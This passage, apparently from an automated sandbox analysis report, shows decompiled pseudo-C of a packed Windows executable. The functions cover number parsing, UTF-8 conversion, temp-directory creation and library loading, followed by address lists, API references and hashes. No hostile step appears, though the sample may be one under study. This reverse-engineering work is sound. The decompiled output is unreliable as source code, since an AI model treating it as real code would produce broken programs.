				_t73 = _t418 + 8; // 0x8
				_t167 =  !=  ? r15d : _t73;
				r15d =  !=  ? r15d : _t73;
				if (_t260 == 0) goto 0xda8e95ec;
				if ( *_t401 == _t260) goto 0xda8e95ec;
				E00007FF77FF7DA8E4394(_t392);
				 *_t392 = 0x16;
				_t169 = E00007FF77FF7DA8E9D00();
				r10d = 0;
				r11d = 0x61;
				r9d = (_t169 | 0xffffffff) / r15d;
				r13d = 0xff10;
				_t78 = _t419 - 0x31; // 0x5af
				r12d = _t78;
				if (_t208 - r12w < 0) goto 0xda8e97db;
				if (_t208 - 0x3a >= 0) goto 0xda8e964d;
				goto 0xda8e97d6;
				_t209 =  *_t415 & 0x0000ffff;
				_t79 =  &(_t415[1]); // 0xffe3
				_t393 = _t79;
				 *_t408 = _t393;
				_t173 =  !=  ? r15d : 0x10;
				r15d =  !=  ? r15d : 0x10;
				goto 0xda8e95ec;
				r10d = 0;
				goto 0xda8e9637;
				if (_t209 - r13w >= 0) goto 0xda8e97c6;
				if (_t209 - 0x660 < 0) goto 0xda8e97db;
				if (_t209 - 0x66a >= 0) goto 0xda8e9674;
				goto 0xda8e97d6;
				if (_t209 - 0x6f0 < 0) goto 0xda8e97db;
				_t80 =  &(_t393[5]); // 0x6fa
				if (_t209 - _t80 >= 0) goto 0xda8e9694;
				goto 0xda8e97d6;
				if (_t209 - 0x966 < 0) goto 0xda8e97db;
				_t81 =  &(_t393[5]); // 0x970
				if (_t209 - _t81 < 0) goto 0xda8e968a;
				_t82 =  &(_t401[0x3b]); // 0x9e6
				if (_t209 - _t82 < 0) goto 0xda8e97db;
				_t83 =  &(_t393[5]); // 0x9f0
				if (_t209 - _t83 < 0) goto 0xda8e968a;
				_t84 =  &(_t401[0x3b]); // 0xa66
				if (_t209 - _t84 < 0) goto 0xda8e97db;
				if (_t209 - _a16 < 0) goto 0xda8e968a;
				if (_t209 - _v168 < 0) goto 0xda8e97db;
				if (_t209 - _v164 < 0) goto 0xda8e968a;
				if (_t209 - _v160 < 0) goto 0xda8e97db;
				if (_t209 - _v156 < 0) goto 0xda8e968a;
				if (_t209 - _v152 < 0) goto 0xda8e97db;
				if (_t209 - _v148 < 0) goto 0xda8e968a;
				if (_t209 - _v144 < 0) goto 0xda8e97db;
				if (_t209 - _v140 < 0) goto 0xda8e968a;
				if (_t209 - _v136 < 0) goto 0xda8e97db;
				if (_t209 - _v132 < 0) goto 0xda8e968a;
				if (_t209 - _v128 < 0) goto 0xda8e97db;
				if (_t209 - _v124 < 0) goto 0xda8e968a;
				if (_t209 - _v120 < 0) goto 0xda8e97db;
				if (_t209 - _v116 < 0) goto 0xda8e968a;
				if (_t209 - _v112 < 0) goto 0xda8e97db;
				if (_t209 - _v108 < 0) goto 0xda8e968a;
				if (_t209 - _v104 < 0) goto 0xda8e97db;
				if (_t209 - _v100 < 0) goto 0xda8e968a;
				if (_t209 - _v96 < 0) goto 0xda8e97db;
				if (_t209 - _v92 < 0) goto 0xda8e968a;
				if ((_t209 & 0x0000ffff) - _v88 - 9 > 0) goto 0xda8e97db;
				goto 0xda8e97d6;
				if (_t209 - _v84 >= 0) goto 0xda8e97db;
				if ((_t209 & 0x0000ffff) - r13d != 0xffffffff) goto 0xda8e980f;
				_t245 = _t209 & 0x0000ffff;
				if (_t245 - 0x41 < 0) goto 0xda8e97e8;
				if (_t245 - 0x5a <= 0) goto 0xda8e97f3;
				if (_t245 - r11d < 0) goto 0xda8e980c;
				if (_t209 - 0x7a > 0) goto 0xda8e980c;
				if ((_t209 & 0x0000ffff) - r11w - _v80 > 0) goto 0xda8e9807;
				goto 0xda8e980f;
				_t416 =  *_t408;
				if ((_t245 + 0x1ffffffa9 | 0xffffffff) - r15d >= 0) goto 0xda8e984f;
				_t210 =  *_t416 & 0x0000ffff;
				_t264 = _t393 + _t401;
				r14d = _t264;
				_t114 =  &(_t416[1]); // 0x2
				 *_t408 = _t114;
				_t268 = ( !=  ? _t265 : _t265 | 0x00000002) | (r10d & 0xffffff00 | _t264 - r14d * r15d > 0x00000000 | r10d & 0xffffff00 | r14d - r9d > 0x00000000) << 0x00000002 | 0x00000008;
				goto 0xda8e960c;
				_t422 = _a8;
				_t116 = _t416 - 2; // -2
				_t395 = _t116;
				_t421 = _v72;
				 *_t408 = _t395;
				if (_t210 == 0) goto 0xda8e9885;
				if ( *_t395 == _t210) goto 0xda8e9885;
				E00007FF77FF7DA8E4394(_t395);
				 *_t395 = 0x16;
				E00007FF77FF7DA8E9D00();
				if ((sil & 0x00000008) != 0) goto 0xda8e98a1;
				_t396 = _t408[1];
				 *_t408 = _t421;
				if (_t396 == 0) goto 0xda8e989a;
				 *_t396 = _t421;
				goto 0xda8e9933;
				r8d = 0x80000000;
				_t121 = _t416 - 1; // -1
				r9d = _t121;
				if ((sil & 0x00000004) == 0) goto 0xda8e98ba;
				goto 0xda8e98d8;
				if ((sil & 0x00000001) == 0) goto 0xda8e9919;
				if ((bpl & sil) == 0) goto 0xda8e98cc;
				if (r14d - r8d <= 0) goto 0xda8e991e;
				goto 0xda8e98d1;
				if (r14d - r9d <= 0) goto 0xda8e9921;
				 *((char*)(_t422 + 0x30)) = 1;
				 *((intOrPtr*)(_t422 + 0x2c)) = 0x22;
				if ((_t268 & 0x00000001) != 0) goto 0xda8e98f1;
				r14d = r14d | 0xffffffff;
				goto 0xda8e9921;
				_t406 = _t408[1];
				if ((0x00000002 & _t268) == 0) goto 0xda8e9909;
				if (_t406 == 0) goto 0xda8e9904;
				 *_t406 =  *_t408;
				goto 0xda8e9933;
				if (_t406 == 0) goto 0xda8e9914;
				 *_t406 =  *_t408;
				goto 0xda8e9933;
				if ((bpl & sil) == 0) goto 0xda8e9921;
				r14d =  ~r14d;
				_t407 = _t408[1];
				if (_t407 == 0) goto 0xda8e9930;
				 *_t407 =  *_t408;
				return r14d;
			}

0x7ff7da8e91b4
0x7ff7da8e91b4
0x7ff7da8e91b4
0x7ff7da8e91b4
0x7ff7da8e91b4
0x7ff7da8e91b4
0x7ff7da8e91b9
0x7ff7da8e91d0
0x7ff7da8e91d5
0x7ff7da8e91d9
0x7ff7da8e91dc
0x7ff7da8e91e4
0x7ff7da8e91ea
0x7ff7da8e91ec
0x7ff7da8e91f1
0x7ff7da8e91f7
0x7ff7da8e91fc
0x7ff7da8e9201
0x7ff7da8e9203
0x7ff7da8e920a
0x7ff7da8e920c
0x7ff7da8e9211
0x7ff7da8e9214
0x7ff7da8e9218
0x7ff7da8e921b
0x7ff7da8e9226
0x7ff7da8e922b
0x7ff7da8e9230
0x7ff7da8e9237
0x7ff7da8e9240
0x7ff7da8e9243
0x7ff7da8e924d
0x7ff7da8e9252
0x7ff7da8e9255
0x7ff7da8e925c
0x7ff7da8e925e
0x7ff7da8e9263
0x7ff7da8e9265
0x7ff7da8e926f
0x7ff7da8e9281
0x7ff7da8e9291
0x7ff7da8e9294
0x7ff7da8e929a
0x7ff7da8e929c
0x7ff7da8e929f
0x7ff7da8e92a2
0x7ff7da8e92a6
0x7ff7da8e92a9
0x7ff7da8e92b9
0x7ff7da8e92c6
0x7ff7da8e92d3
0x7ff7da8e92db
0x7ff7da8e92e1
0x7ff7da8e92e9
0x7ff7da8e92e9
0x7ff7da8e92ed
0x7ff7da8e92f5
0x7ff7da8e92fb
0x7ff7da8e9303
0x7ff7da8e9309
0x7ff7da8e9311
0x7ff7da8e9319
0x7ff7da8e9321
0x7ff7da8e9329
0x7ff7da8e9331
0x7ff7da8e9339
0x7ff7da8e9341
0x7ff7da8e9349
0x7ff7da8e9351
0x7ff7da8e9359
0x7ff7da8e9361
0x7ff7da8e9369
0x7ff7da8e9371
0x7ff7da8e9379
0x7ff7da8e9384
0x7ff7da8e938f
0x7ff7da8e93a1
0x7ff7da8e93aa
0x7ff7da8e93b4
0x7ff7da8e93bb
0x7ff7da8e93c3
0x7ff7da8e93cd
0x7ff7da8e93db
0x7ff7da8e93e3
0x7ff7da8e93ec
0x7ff7da8e93fa
0x7ff7da8e9402
0x7ff7da8e940b
0x7ff7da8e9419
0x7ff7da8e9421
0x7ff7da8e942a
0x7ff7da8e9438
0x7ff7da8e9440
0x7ff7da8e9448
0x7ff7da8e9456
0x7ff7da8e9460
0x7ff7da8e946c
0x7ff7da8e9477
0x7ff7da8e9484
0x7ff7da8e948f
0x7ff7da8e949c
0x7ff7da8e94a7
0x7ff7da8e94b4
0x7ff7da8e94bf
0x7ff7da8e94cc
0x7ff7da8e94d7
0x7ff7da8e94e4
0x7ff7da8e94ef
0x7ff7da8e94fc
0x7ff7da8e9503
0x7ff7da8e9510
0x7ff7da8e9517
0x7ff7da8e9524
0x7ff7da8e952b
0x7ff7da8e9538
0x7ff7da8e953f
0x7ff7da8e9556
0x7ff7da8e9558
0x7ff7da8e9565
0x7ff7da8e956f
0x7ff7da8e9571
0x7ff7da8e957b
0x7ff7da8e9580
0x7ff7da8e9580
0x7ff7da8e9583
0x7ff7da8e9587
0x7ff7da8e958f
0x7ff7da8e9594
0x7ff7da8e9597
0x7ff7da8e959c
0x7ff7da8e95a2
0x7ff7da8e95a5
0x7ff7da8e95ab
0x7ff7da8e95ae
0x7ff7da8e95ae
0x7ff7da8e95b2
0x7ff7da8e95b5
0x7ff7da8e95bc
0x7ff7da8e95c1
0x7ff7da8e95c4
0x7ff7da8e95c8
0x7ff7da8e95cc
0x7ff7da8e95d2
0x7ff7da8e95d7
0x7ff7da8e95d9
0x7ff7da8e95de
0x7ff7da8e95e4
0x7ff7da8e95e9
0x7ff7da8e95f4
0x7ff7da8e95ff
0x7ff7da8e9602
0x7ff7da8e9608
0x7ff7da8e9608
0x7ff7da8e9610
0x7ff7da8e961a
0x7ff7da8e9622
0x7ff7da8e9627
0x7ff7da8e962b
0x7ff7da8e962b
0x7ff7da8e962f
0x7ff7da8e963a
0x7ff7da8e963e
0x7ff7da8e9641
0x7ff7da8e9643
0x7ff7da8e964b
0x7ff7da8e9651
0x7ff7da8e965a
0x7ff7da8e9668
0x7ff7da8e966f
0x7ff7da8e967c
0x7ff7da8e9682
0x7ff7da8e9688
0x7ff7da8e968f
0x7ff7da8e969c
0x7ff7da8e96a2
0x7ff7da8e96a8
0x7ff7da8e96aa
0x7ff7da8e96b0
0x7ff7da8e96b6
0x7ff7da8e96bc
0x7ff7da8e96be
0x7ff7da8e96c4
0x7ff7da8e96d2
0x7ff7da8e96db
0x7ff7da8e96e6
0x7ff7da8e96ef
0x7ff7da8e96fa
0x7ff7da8e9703
0x7ff7da8e970e
0x7ff7da8e971b
0x7ff7da8e9726
0x7ff7da8e9733
0x7ff7da8e973e
0x7ff7da8e974b
0x7ff7da8e9756
0x7ff7da8e9763
0x7ff7da8e976a
0x7ff7da8e9777
0x7ff7da8e977e
0x7ff7da8e978b
0x7ff7da8e9792
0x7ff7da8e979f
0x7ff7da8e97a6
0x7ff7da8e97bd
0x7ff7da8e97c4
0x7ff7da8e97ce
0x7ff7da8e97d9
0x7ff7da8e97db
0x7ff7da8e97e1
0x7ff7da8e97e6
0x7ff7da8e97eb
0x7ff7da8e97f1
0x7ff7da8e9802
0x7ff7da8e980a
0x7ff7da8e980f
0x7ff7da8e9815
0x7ff7da8e9817
0x7ff7da8e9822
0x7ff7da8e9833
0x7ff7da8e983b
0x7ff7da8e9845
0x7ff7da8e9848
0x7ff7da8e984a
0x7ff7da8e984f
0x7ff7da8e9857
0x7ff7da8e9857
0x7ff7da8e985b
0x7ff7da8e9868
0x7ff7da8e986e
0x7ff7da8e9873
0x7ff7da8e9875
0x7ff7da8e987a
0x7ff7da8e9880
0x7ff7da8e9889
0x7ff7da8e988b
0x7ff7da8e988f
0x7ff7da8e9895
0x7ff7da8e9897
0x7ff7da8e989c
0x7ff7da8e98a1
0x7ff7da8e98a7
0x7ff7da8e98a7
0x7ff7da8e98af
0x7ff7da8e98b8
0x7ff7da8e98be
0x7ff7da8e98c3
0x7ff7da8e98c8
0x7ff7da8e98ca
0x7ff7da8e98cf
0x7ff7da8e98da
0x7ff7da8e98df
0x7ff7da8e98e9
0x7ff7da8e98eb
0x7ff7da8e98ef
0x7ff7da8e98f1
0x7ff7da8e98f7
0x7ff7da8e98fc
0x7ff7da8e9901
0x7ff7da8e9907
0x7ff7da8e990c
0x7ff7da8e9911
0x7ff7da8e9917
0x7ff7da8e991c
0x7ff7da8e991e
0x7ff7da8e9921
0x7ff7da8e9928
0x7ff7da8e992d
0x7ff7da8e994d

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8E91F7
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8E95E4
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8E9880

Strings

p, xrefs: 00007FF7DA8E9321
f, xrefs: 00007FF7DA8E9319
p, xrefs: 00007FF7DA8E92A9

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$p$p
API String ID: 3215553584-1995029353
Opcode ID: 8b43f30c9b627f105c9440690760d813b6cbc2015482011a3dd154e3df4de9b0
Instruction ID: 3d6dbb7c927b26ff8ba6c76f16138c58101197391a156b1f35ba7e2b1af69be1
Opcode Fuzzy Hash: 8b43f30c9b627f105c9440690760d813b6cbc2015482011a3dd154e3df4de9b0
Instruction Fuzzy Hash: E1129E71A08143C6FB22BE15D0546BDF691FB60750FC44077DE9A066C6DFBEEAA08B20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D7BA0 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 99COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF7DA8D7C35
MultiByteToWideChar.KERNEL32 ref: 00007FF7DA8D7C77

Strings

MultiByteToWideChar, xrefs: 00007FF7DA8D7CBD
Out of memory., xrefs: 00007FF7DA8D7CA6
Failed to get wchar_t buffer size., xrefs: 00007FF7DA8D7CB6
Failed to decode wchar_t from UTF-8, xrefs: 00007FF7DA8D7C9D
win32_utils_from_utf8, xrefs: 00007FF7DA8D7CAD

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
API String ID: 626452242-876015163
Opcode ID: 7b6c31b8f2184ad36c280b88cf2315070f315e80235ff8fca529495e0cf5476c
Instruction ID: 0e09a6cabd6015ca548be7467f349687970a08901be1a56bac06b23c241a8040
Opcode Fuzzy Hash: 7b6c31b8f2184ad36c280b88cf2315070f315e80235ff8fca529495e0cf5476c
Instruction Fuzzy Hash: CE41C532A08B438AFA22EF15E44056DE2A5FB54790FD80176EE4D47B96DF3CD562C720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D6460 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00007FF77FF7DA8D6460(void* __edx, void* __rax, long long __rbx, void* __rcx, void* __r8, char _a24, char _a8216, signed int _a16408, long long _a16448) {
				void* __rdi;
				long _t18;
				void* _t36;
				void* _t42;
				void* _t43;
				signed long long _t52;
				signed long long _t53;
				long long _t55;
				signed long long _t79;
				void* _t81;
				void* _t82;
				void* _t83;
				void* _t91;
				void* _t92;
				void* _t93;

				_t86 = __r8;
				_t55 = __rbx;
				_t36 = __edx;
				E00007FF77FF7DA8DAD20(0x4030, __rax, _t92, _t93);
				_t84 = _t83 - __rax;
				_t52 =  *0xda90d008; // 0xde4e6c2f3c2e
				_t53 = _t52 ^ _t83 - __rax;
				_a16408 = _t53;
				_t74 = __rcx;
				r8d = 0;
				E00007FF77FF7DA8D79A0(_t53, __rbx, __rcx, __rcx, _t81, __r8);
				if (_t53 != 0) goto 0xda8d64a9;
				E00007FF77FF7DA8D2770(_t53, "LOADER: Failed to convert runtime-tmpdir to a wide string.\n", _t74, _t86, _t91);
				goto 0xda8d65b8;
				r8d = 0x1000;
				_a16448 = _t55;
				_t18 = ExpandEnvironmentStringsW(??, ??, ??);
				E00007FF77FF7DA8E3FEC(0, _t53,  &_a24, _t86);
				if (_t18 != 0) goto 0xda8d64e6;
				E00007FF77FF7DA8D2770(_t53, "LOADER: Failed to expand environment variables in the runtime-tmpdir.\n",  &_a24, _t86, _t91);
				goto 0xda8d65b0;
				if (E00007FF77FF7DA8D7710(_t55,  &_a24) == 0) goto 0xda8d6500;
				E00007FF77FF7DA8E5E94(_t53, _t55,  &_a24, _t81, _t82);
				goto 0xda8d6512;
				r8d = 0x1000;
				E00007FF77FF7DA8E5298(0, _t36, _t53, _t55,  &_a24,  &_a24, _t53, _t81, _t86);
				if (_t53 != 0) goto 0xda8d652d;
				E00007FF77FF7DA8D2770(_t53, "LOADER: Failed to obtain the absolute path of the runtime-tmpdir.\n",  &_a24, _t86, _t91);
				goto 0xda8d65b0;
				r8d = 0x2000;
				E00007FF77FF7DA8DC170();
				E00007FF77FF7DA8DC6B4(0x5c, _t53, _t91);
				_t79 = _t53;
				if (_t53 == 0) goto 0xda8d65a2;
				asm("o16 nop [eax+eax]");
				E00007FF77FF7DA8E5F18(_t42, _t43,  &_a8216, _t53, _t79, (_t79 - _t53 >> 1) + 1);
				CreateDirectoryW(??, ??);
				_t10 = _t79 + 2; // 0x2
				E00007FF77FF7DA8DC6B4(0x5c, _t10, _t91);
				if (_t53 != 0) goto 0xda8d6560;
				return E00007FF77FF7DA8DACF0(CreateDirectoryW(??, ??), 0, _a16408 ^ _t84);
			}

0x7ff7da8d6460
0x7ff7da8d6460
0x7ff7da8d6460
0x7ff7da8d6467
0x7ff7da8d646c
0x7ff7da8d646f
0x7ff7da8d6476
0x7ff7da8d6479
0x7ff7da8d6481
0x7ff7da8d6484
0x7ff7da8d6489
0x7ff7da8d6494
0x7ff7da8d649d
0x7ff7da8d64a4
0x7ff7da8d64a9
0x7ff7da8d64af
0x7ff7da8d64bf
0x7ff7da8d64ca
0x7ff7da8d64d1
0x7ff7da8d64da
0x7ff7da8d64e1
0x7ff7da8d64f2
0x7ff7da8d64f9
0x7ff7da8d64fe
0x7ff7da8d6500
0x7ff7da8d650d
0x7ff7da8d6518
0x7ff7da8d6521
0x7ff7da8d6528
0x7ff7da8d6537
0x7ff7da8d653d
0x7ff7da8d654a
0x7ff7da8d654f
0x7ff7da8d6555
0x7ff7da8d6557
0x7ff7da8d6577
0x7ff7da8d6586
0x7ff7da8d6591
0x7ff7da8d6595
0x7ff7da8d65a0
0x7ff7da8d65d0

APIs

Part of subcall function 00007FF7DA8D79A0: MultiByteToWideChar.KERNEL32 ref: 00007FF7DA8D79DA

ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF7DA8D67AF,?,00000000,?,TokenIntegrityLevel), ref: 00007FF7DA8D64BF

Part of subcall function 00007FF7DA8D2770: MessageBoxW.USER32 ref: 00007FF7DA8D2841

Strings

LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF7DA8D64D3
LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF7DA8D6496
LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF7DA8D651A

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
API String ID: 1662231829-3498232454
Opcode ID: 637f42fe5a5eae45e2a76b8203e3e34e2a3bc52aa0a674b014bab48cab2bf0ef
Instruction ID: 1b3900fb572a1101cbb8a53efb34f724cdde03e97494a1381f1cc6858b207863
Opcode Fuzzy Hash: 637f42fe5a5eae45e2a76b8203e3e34e2a3bc52aa0a674b014bab48cab2bf0ef
Instruction Fuzzy Hash: 6E31A451B2864384FE26B721A9113BDD261BF98780FC80473DE4E42797EE2CE5148720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8DCE48 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 50%

			E00007FF77FF7DA8DCE48(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				struct HINSTANCE__* _t81;
				long long _t85;
				void* _t89;
				struct HINSTANCE__* _t94;
				long _t97;
				void* _t100;
				signed long long _t101;
				WCHAR* _t104;

				 *((long long*)(_t89 + 8)) = __rbx;
				 *((long long*)(_t89 + 0x10)) = _t85;
				 *((long long*)(_t89 + 0x18)) = __rsi;
				_t101 = _t100 | 0xffffffff;
				_t61 =  *((intOrPtr*)(0x7ff7da8d0000 + 0x4c710 + _t81 * 8));
				if (_t61 == _t101) goto 0xda8dcf77;
				if (_t61 != 0) goto 0xda8dcf79;
				if (__r8 == __r9) goto 0xda8dcf6f;
				_t67 =  *((intOrPtr*)(0x7ff7da8d0000 + 0x4c6f8 + __rsi * 8));
				if (_t67 == 0) goto 0xda8dceba;
				if (_t67 != _t101) goto 0xda8dcf51;
				goto 0xda8dcf25;
				r8d = 0x800;
				LoadLibraryExW(_t104, _t100, _t97);
				_t68 = _t61;
				if (_t61 != 0) goto 0xda8dcf31;
				if (GetLastError() != 0x57) goto 0xda8dcf13;
				_t14 = _t68 + 7; // 0x7
				r8d = _t14;
				if (E00007FF77FF7DA8E9950(__r8) == 0) goto 0xda8dcf13;
				r8d = 0;
				LoadLibraryExW(??, ??, ??);
				if (_t61 != 0) goto 0xda8dcf31;
				 *((intOrPtr*)(0x7ff7da8d0000 + 0x4c6f8 + __rsi * 8)) = _t101;
				goto 0xda8dce98;
				_t21 = 0x7ff7da8d0000 + 0x4c6f8 + __rsi * 8;
				_t65 =  *_t21;
				 *_t21 = _t61;
				if (_t65 == 0) goto 0xda8dcf51;
				FreeLibrary(_t94);
				GetProcAddress(_t81);
				if (_t65 == 0) goto 0xda8dcf6f;
				 *((intOrPtr*)(0x7ff7da8d0000 + 0x4c710 + _t81 * 8)) = _t65;
				goto 0xda8dcf79;
				 *((intOrPtr*)(0x7ff7da8d0000 + 0x4c710 + _t81 * 8)) = _t101;
				return 0;
			}

0x7ff7da8dce48
0x7ff7da8dce4d
0x7ff7da8dce52
0x7ff7da8dce6d
0x7ff7da8dce7a
0x7ff7da8dce86
0x7ff7da8dce8f
0x7ff7da8dce98
0x7ff7da8dcea1
0x7ff7da8dcead
0x7ff7da8dceb2
0x7ff7da8dceb8
0x7ff7da8dcec7
0x7ff7da8dcecd
0x7ff7da8dced3
0x7ff7da8dced9
0x7ff7da8dcee4
0x7ff7da8dcee6
0x7ff7da8dcee6
0x7ff7da8dcefb
0x7ff7da8dcefd
0x7ff7da8dcf05
0x7ff7da8dcf11
0x7ff7da8dcf1d
0x7ff7da8dcf2c
0x7ff7da8dcf3b
0x7ff7da8dcf3b
0x7ff7da8dcf3b
0x7ff7da8dcf46
0x7ff7da8dcf4b
0x7ff7da8dcf57
0x7ff7da8dcf60
0x7ff7da8dcf65
0x7ff7da8dcf6d
0x7ff7da8dcf6f
0x7ff7da8dcf95

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF7DA8DD0FA,?,?,?,00007FF7DA8DCDEC,?,?,00000001,00007FF7DA8DCA09), ref: 00007FF7DA8DCECD
GetLastError.KERNEL32(?,?,?,00007FF7DA8DD0FA,?,?,?,00007FF7DA8DCDEC,?,?,00000001,00007FF7DA8DCA09), ref: 00007FF7DA8DCEDB
LoadLibraryExW.KERNEL32(?,?,?,00007FF7DA8DD0FA,?,?,?,00007FF7DA8DCDEC,?,?,00000001,00007FF7DA8DCA09), ref: 00007FF7DA8DCF05
FreeLibrary.KERNEL32(?,?,?,00007FF7DA8DD0FA,?,?,?,00007FF7DA8DCDEC,?,?,00000001,00007FF7DA8DCA09), ref: 00007FF7DA8DCF4B
GetProcAddress.KERNEL32(?,?,?,00007FF7DA8DD0FA,?,?,?,00007FF7DA8DCDEC,?,?,00000001,00007FF7DA8DCA09), ref: 00007FF7DA8DCF57

Strings

api-ms-, xrefs: 00007FF7DA8DCEED

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b1925c37cafe71baed539b1876bc23373fb45261b76e946b888b2af6812d26f2
Instruction ID: f0ced481abc93763e2e58935ba08f2658f2b851d3376a16cf795d6dedd181fca
Opcode Fuzzy Hash: b1925c37cafe71baed539b1876bc23373fb45261b76e946b888b2af6812d26f2
Instruction Fuzzy Hash: F8310661B1AA4299FE13BB12A8005BDE394BF48BA4FDD4576DD2D47382DF7CE4608320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D79A0 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF7DA8D79DA

Part of subcall function 00007FF7DA8D2620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7DA8D76B4,?,?,?,?,?,?,?,?,?,?,?,00007FF7DA8D101D), ref: 00007FF7DA8D2654
Part of subcall function 00007FF7DA8D2620: MessageBoxW.USER32 ref: 00007FF7DA8D272C

MultiByteToWideChar.KERNEL32 ref: 00007FF7DA8D7A60

Strings

MultiByteToWideChar, xrefs: 00007FF7DA8D79EE, 00007FF7DA8D7A71
Out of memory., xrefs: 00007FF7DA8D7A22
Failed to get wchar_t buffer size., xrefs: 00007FF7DA8D79E7
Failed to decode wchar_t from UTF-8, xrefs: 00007FF7DA8D7A6A
win32_utils_from_utf8, xrefs: 00007FF7DA8D7A29

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLastMessage
